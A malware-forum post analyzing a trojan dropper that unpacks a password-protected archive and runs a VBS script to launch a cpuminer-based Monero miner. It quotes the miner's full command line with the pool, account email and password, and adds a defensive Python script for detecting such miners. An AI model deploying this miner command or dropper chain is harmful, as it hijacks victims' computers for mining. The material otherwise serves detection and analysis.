ikolor wrote: Sun Jan 01, 2017 1:18 pm
Please make selection ...2017
https://www.virustotal.com/en/file/ca2e ... 483276621/
Trojan muldrop with coin miner as payload.
SFX archive; the next stage is the actual malware dropper -> extracts files to %UserProfile%\Public. The main malware is inside a password-protected zip file called dokinz.zip. This zip file is unpacked by ConsoleApplication1.exe (also dropped by the malware) with the password "dokinzakbar" (hardcoded inside ConsoleApplication1.exe). After unpacking, ConsoleApplication1.exe executes the malicious script NVidiaDriverUpdate.vbs.
TL;DR: it is a cryptocurrency miner configured as
Code:
"NvidiaUpdater.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u kso-magnitka@yandex.ru -p 2101skymagicss -t 1", 0, true
where NvidiaUpdater.exe is a coin miner called "cpuminer-multi".
This email can be found in Google and leads to Magnitogorsk, Russia.
Posts moved.
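A defender-side triage helper, added here as an example and not code from the poster or from any tool mentioned in the thread: it parses cpuminer-multi style options (-a/--algo, -o/--url, -u, -t) out of a process command line, extracts the stratum pool host and port for network blocking, and flags scripts launched from %UserProfile%\Public as in the dropper chain described above. The sample events, pool, wallet and password values are constructed placeholders, not the indicators quoted in the post.

```python
import re
import shlex
from urllib.parse import urlsplit

# Constructed sample process-creation events (not from the original post).
# Pool, wallet and password values are placeholders, not the ones quoted in the thread.
SAMPLE_EVENTS = [
    {"image": r"C:\Users\Public\NvidiaUpdater.exe",
     "cmdline": "NvidiaUpdater.exe -a cryptonight -o stratum+tcp://pool.example.invalid:45560 "
                "-u wallet@example.invalid -p x -t 1"},
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\Public\NVidiaDriverUpdate.vbs"'},
    {"image": r"C:\Program Files\Vendor\updater.exe",
     "cmdline": '"updater.exe" --check --silent'},
]

STRATUM_RE = re.compile(r"^stratum\+(tcp|ssl|tls)://", re.IGNORECASE)
# Algorithm names accepted by cpuminer-multi style miners via -a / --algo (assumed subset).
MINER_ALGOS = {"cryptonight", "cryptonight-light", "scrypt", "sha256d", "x11", "lyra2re"}
PUBLIC_DIR_RE = re.compile(r"\\users\\public\\", re.IGNORECASE)


def _argv(cmdline):
    """Split a Windows command line into tokens, keeping backslashes intact."""
    try:
        toks = shlex.split(cmdline, posix=False)
    except ValueError:
        toks = cmdline.split()
    return [t.strip('"') for t in toks]


def find_miner_indicators(cmdline):
    """Parse cpuminer-style options; return a dict of indicators, or None if none found."""
    argv = _argv(cmdline)
    found = {}
    i = 0
    while i < len(argv):
        tok = argv[i]
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        if tok in ("-a", "--algo"):
            found["algo"] = nxt.lower(); i += 2; continue
        if tok.startswith("--algo="):
            found["algo"] = tok.split("=", 1)[1].lower(); i += 1; continue
        if tok in ("-o", "--url"):
            found["url"] = nxt; i += 2; continue
        if tok.startswith("--url="):
            found["url"] = tok.split("=", 1)[1]; i += 1; continue
        if tok in ("-u", "--user"):
            found["user"] = nxt; i += 2; continue
        if tok in ("-t", "--threads"):
            found["threads"] = nxt; i += 2; continue
        i += 1
    url = found.get("url", "")
    if STRATUM_RE.match(url):
        # Pool host/port are the values worth feeding to egress blocking and NetFlow hunts.
        parts = urlsplit(url)
        found["pool_host"] = parts.hostname
        found["pool_port"] = parts.port
    strong = int("pool_host" in found) + int(found.get("algo") in MINER_ALGOS)
    if strong == 0:
        return None
    found["confidence"] = "high" if strong == 2 else "medium"
    return found


def triage_event(event):
    """Return a verdict label for one process-creation event."""
    if find_miner_indicators(event["cmdline"]):
        return "miner"
    image = event["image"].lower()
    # Script hosts executing a .vbs out of the Public profile match the dropper chain.
    if image.endswith(("wscript.exe", "cscript.exe")) and PUBLIC_DIR_RE.search(event["cmdline"]):
        return "script_from_public"
    if PUBLIC_DIR_RE.search(image):
        return "exe_from_public"
    return "no_match"


def triage_events(events):
    return [triage_event(e) for e in events]


if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, triage_events(SAMPLE_EVENTS)):
        print(f"{verdict:20} {ev['image']}")
```

The stratum URL and the algorithm flag are scored separately so that a renamed binary still trips the rule on either signal alone; the extracted pool host and port can be pushed to a proxy or firewall block list independently of the file hash, which changes with every repack of the SFX.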